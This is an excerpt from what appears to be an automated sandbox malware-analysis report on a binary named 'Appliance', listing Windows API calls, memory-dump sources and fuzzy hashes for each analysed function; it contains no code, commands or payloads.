                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 43455801-0
                                                                                                                                            • Opcode ID: 12137a95ecc7302083046c56aa043cb200de2ff9b56237a3cd24b9f1fc9fc3e0
                                                                                                                                            • Instruction ID: 79700d075c613d8f996a10a9bb3adaa384f1fd192c9f5d239ba7e10af097eb07
                                                                                                                                            • Opcode Fuzzy Hash: 12137a95ecc7302083046c56aa043cb200de2ff9b56237a3cd24b9f1fc9fc3e0
                                                                                                                                            • Instruction Fuzzy Hash: A1113976004209BFDF129F91DC88E9A7F6DEB08365F008416BA19AA1A1C771AD599BA0
                                                                                                                                            APIs
                                                                                                                                            • GetDC.USER32(00000000), ref: 00E25B7C
                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E25B8D
                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E25B94
                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00E25B9C
                                                                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E25BB3
                                                                                                                                            • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00E25BC5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CapsDevice$Release
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1035833867-0
                                                                                                                                            • Opcode ID: 1c42e3324b9e442aa84381ab21a03786a8c433bac315df0e0176350ad72f8f46
                                                                                                                                            • Instruction ID: c2e4f000bc4f14058e42655aa79d2c4f4e5ad15dde910cf2ff6b487df0488324
                                                                                                                                            • Opcode Fuzzy Hash: 1c42e3324b9e442aa84381ab21a03786a8c433bac315df0e0176350ad72f8f46
                                                                                                                                            • Instruction Fuzzy Hash: 09018475A00718BFEB149BA69D49F4E7FB8EB44352F004465FA05F7280D6709C05CF90
                                                                                                                                            APIs
                                                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DC32AF
                                                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00DC32B7
                                                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DC32C2
                                                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DC32CD
                                                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00DC32D5
                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DC32DD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Virtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4278518827-0
                                                                                                                                            • Opcode ID: 3e57152cef25fdf822ee186b46ba854631041bcbdb61811067f9fb72e802caf0
                                                                                                                                            • Instruction ID: d5cdbb6edbc2aa123c0e065feec89d89dbeb093cc68738c1aa7680071e94a943
                                                                                                                                            • Opcode Fuzzy Hash: 3e57152cef25fdf822ee186b46ba854631041bcbdb61811067f9fb72e802caf0
                                                                                                                                            • Instruction Fuzzy Hash: DF016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                                                                                                            APIs
                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E2F447
                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E2F45D
                                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00E2F46C
                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E2F47B
                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E2F485
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E2F48C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 839392675-0
                                                                                                                                            • Opcode ID: 6670a769ccb9db30a734aa3eb79b464c5f584648c4977151d1eae585dbac3793
                                                                                                                                            • Instruction ID: d51f69a95b2b374102289554988ffec3c0cbbe4607eab6c34ea8949ae984822f
                                                                                                                                            • Opcode Fuzzy Hash: 6670a769ccb9db30a734aa3eb79b464c5f584648c4977151d1eae585dbac3793
                                                                                                                                            • Instruction Fuzzy Hash: 5EF01D72245658BFE73557539C0EEEB3B7CEBC6B12F000459F601E109096A05A46C6B6
                                                                                                                                            APIs
                                                                                                                                            • GetClientRect.USER32(?), ref: 00E034EF
                                                                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 00E03506
                                                                                                                                            • GetWindowDC.USER32(?), ref: 00E03512
                                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 00E03521
                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00E03533
                                                                                                                                            • GetSysColor.USER32(00000005), ref: 00E0354D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 272304278-0
                                                                                                                                            • Opcode ID: fdc9ef081321151175f1bac0c4623def5035d73038c355cc9932e4af98b3cd63
                                                                                                                                            • Instruction ID: 561a864458c6fe13672b0807ea5b39631e285784bc484c363fb135ec1f19771f
                                                                                                                                            • Opcode Fuzzy Hash: fdc9ef081321151175f1bac0c4623def5035d73038c355cc9932e4af98b3cd63
                                                                                                                                            • Instruction Fuzzy Hash: E7018631504205EFDB255FB2DC08FEA7BB5FB08322F100921FA1AB21A0CB311E86AB11
                                                                                                                                            APIs
                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E221CC
                                                                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 00E221D8
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00E221E1
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00E221E9
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00E221F2
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00E221F9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 146765662-0
                                                                                                                                            • Opcode ID: 5ec0e9d81efaa491ea1eea8f36e5702801c839880918772708cb732b39f29c42
                                                                                                                                            • Instruction ID: 79562b91bfdd5dd40dd1287db7afe74f7ac12d66d95b79e63f575428251dacf5
                                                                                                                                            • Opcode Fuzzy Hash: 5ec0e9d81efaa491ea1eea8f36e5702801c839880918772708cb732b39f29c42
                                                                                                                                            • Instruction Fuzzy Hash: 44E0E576008605BFDB151FA2ED0C90ABF39FF49323B104A21F225E2470CB32A464DB51
                                                                                                                                            APIs
                                                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00E4B903
                                                                                                                                              • Part of subcall function 00DC41EA: _wcslen.LIBCMT ref: 00DC41EF
                                                                                                                                            • GetProcessId.KERNEL32(00000000), ref: 00E4B998
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00E4B9C7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                            • String ID: <$@
                                                                                                                                            • API String ID: 146682121-1426351568
                                                                                                                                            • Opcode ID: 02b5b51f96e36134498dd62e019fe833c6a82742ddbb0f4039a60dbb481f8cbf
                                                                                                                                            • Instruction ID: bdeb4126558bfbfc7498952fb10b65890c337d3e077366e78edf6ea09fd20453
                                                                                                                                            • Opcode Fuzzy Hash: 02b5b51f96e36134498dd62e019fe833c6a82742ddbb0f4039a60dbb481f8cbf
                                                                                                                                            • Instruction Fuzzy Hash: CE715474A0021ADFCB14EF65C494A9EBBF4EF08314F048499E956AB362CB71ED45CBA0
                                                                                                                                            APIs
                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E27B6D
                                                                                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E27BA3
                                                                                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E27BB4
                                                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E27C36
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                            • String ID: DllGetClassObject
                                                                                                                                            • API String ID: 753597075-1075368562
                                                                                                                                            • Opcode ID: 482bb8367a45a2940bd08d2bcc7dc633bebc9ee1b0544ebdade138dad0f4c726
                                                                                                                                            • Instruction ID: b23d0d1543db8d6dab855041a9747e19b401733c21d00c1bddd76bb37c5f70fb
                                                                                                                                            • Opcode Fuzzy Hash: 482bb8367a45a2940bd08d2bcc7dc633bebc9ee1b0544ebdade138dad0f4c726
                                                                                                                                            • Instruction Fuzzy Hash: C241B2B1604324EFDB19CF34E885A9ABBB9EF48314F1490A9AC45AF205D7B1DD44CBA0
                                                                                                                                            APIs
                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E548D1
                                                                                                                                            • IsMenu.USER32(?), ref: 00E548E6
                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E5492E
                                                                                                                                            • DrawMenuBar.USER32 ref: 00E54941
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                            • String ID: 0
                                                                                                                                            • API String ID: 3076010158-4108050209
                                                                                                                                            • Opcode ID: 4402b741514f8d1ccbafafddf343a6aa74b3acf486293e4732715ccfcb206806
                                                                                                                                            • Instruction ID: 545b21b8f0a701c0ce7efe186eeeae3692f9c4e6ea6a9f5e45462afff2672a12
                                                                                                                                            • Opcode Fuzzy Hash: 4402b741514f8d1ccbafafddf343a6aa74b3acf486293e4732715ccfcb206806
                                                                                                                                            • Instruction Fuzzy Hash: 28417BB5A0024AEFDF14CF51D884EAABBB9FF45329F045519FD45A7290D330AD88CB60
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333
                                                                                                                                              • Part of subcall function 00E245FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E24620
                                                                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E227B3
                                                                                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E227C6
                                                                                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E227F6
                                                                                                                                              • Part of subcall function 00DC8577: _wcslen.LIBCMT ref: 00DC858A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                            • API String ID: 2081771294-1403004172
                                                                                                                                            • Opcode ID: 12ce3f7538aa4008808bec964f71e1529fb0639a01260820db34b3fe207b58f1
                                                                                                                                            • Instruction ID: 6d9d876f2e96142308a9a35eada75ac17d50e3841a71e7744de99249ea6a317b
                                                                                                                                            • Opcode Fuzzy Hash: 12ce3f7538aa4008808bec964f71e1529fb0639a01260820db34b3fe207b58f1
                                                                                                                                            • Instruction Fuzzy Hash: 8E212671900204BFDB19AB60EC46DFE7BB8DF45364F00522EF512B71E1CB74894A9670
                                                                                                                                            APIs
                                                                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E53A29
                                                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 00E53A30
                                                                                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E53A45
                                                                                                                                            • DestroyWindow.USER32(?), ref: 00E53A4D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                            • String ID: SysAnimate32
                                                                                                                                            • API String ID: 3529120543-1011021900
                                                                                                                                            • Opcode ID: 3b27d79b73a5c2bd87d82c4a1aeb093ec7efae15149a8a8d4620e0422b086d2a
                                                                                                                                            • Instruction ID: 21fc27450ceae33f267e505944c755a6f5f33a683df7edb509323390c1f4b10c
                                                                                                                                            • Opcode Fuzzy Hash: 3b27d79b73a5c2bd87d82c4a1aeb093ec7efae15149a8a8d4620e0422b086d2a
                                                                                                                                            • Instruction Fuzzy Hash: 7E21A171600209AFEF109FB4DC80FBB77E9EB843A9F106A19FE91A2191C771CD459760
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0
                                                                                                                                            • GetCursorPos.USER32(?), ref: 00E59A5D
                                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E59A72
                                                                                                                                            • GetCursorPos.USER32(?), ref: 00E59ABA
                                                                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00E59AF0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                            • String ID: (
                                                                                                                                            • API String ID: 2864067406-2063206799
                                                                                                                                            • Opcode ID: dfd9b08ad9abad3d9bcd6248c394b6ff7f7b2b7d2cf3cb26939080ef53024e6f
                                                                                                                                            • Instruction ID: 7f73743bb85728ca8318754e2058f203d0d3889ae8c115400c12137e9dbfcd24
                                                                                                                                            • Opcode Fuzzy Hash: dfd9b08ad9abad3d9bcd6248c394b6ff7f7b2b7d2cf3cb26939080ef53024e6f
                                                                                                                                            • Instruction Fuzzy Hash: 0121DD30600218FFDF298F55C848EFE7BB9EB49312F404859FA05AB1A2D3309959DB60
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0
                                                                                                                                            • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00DC1AF4
                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00E031F9
                                                                                                                                            • GetCursorPos.USER32(?), ref: 00E03203
                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00E0320E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                            • String ID: (
                                                                                                                                            • API String ID: 4127811313-2063206799
                                                                                                                                            • Opcode ID: a6086968ab40b9e5696e4ba6067a318fc5cbb3a415309c27966e5896a66da3de
                                                                                                                                            • Instruction ID: 734ccf916c33fe92d57431fe4703e94a6aaa706c4d898e11d571c6a2191818ea
                                                                                                                                            • Opcode Fuzzy Hash: a6086968ab40b9e5696e4ba6067a318fc5cbb3a415309c27966e5896a66da3de
                                                                                                                                            • Instruction Fuzzy Hash: 04112835A0212AAFCB149FA9C945EEE77B8FF05355F100856E902F3141D770BA96CBB1
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00DE508E,?,?,00DE502E,?,00E898D8,0000000C,00DE5185,?,00000002), ref: 00DE50FD
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00DE5110
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00DE508E,?,?,00DE502E,?,00E898D8,0000000C,00DE5185,?,00000002,00000000), ref: 00DE5133
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                            • Opcode ID: 8b3a87d0f0276e4bf9924d05518f1b6ac18949dc65ed90637bda4197782c4220
                                                                                                                                            • Instruction ID: 2135eed80587471f42b9cf183d667ce517c3c3df87aeee60dad3805c2273a137
                                                                                                                                            • Opcode Fuzzy Hash: 8b3a87d0f0276e4bf9924d05518f1b6ac18949dc65ed90637bda4197782c4220
                                                                                                                                            • Instruction Fuzzy Hash: 1FF0C834944708BFDB156F96EC09B9DBFB4EF04752F040064F805B2160DB705D84DBA1
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryA.KERNEL32 ref: 00E1E785
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E1E797
                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00E1E7BD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
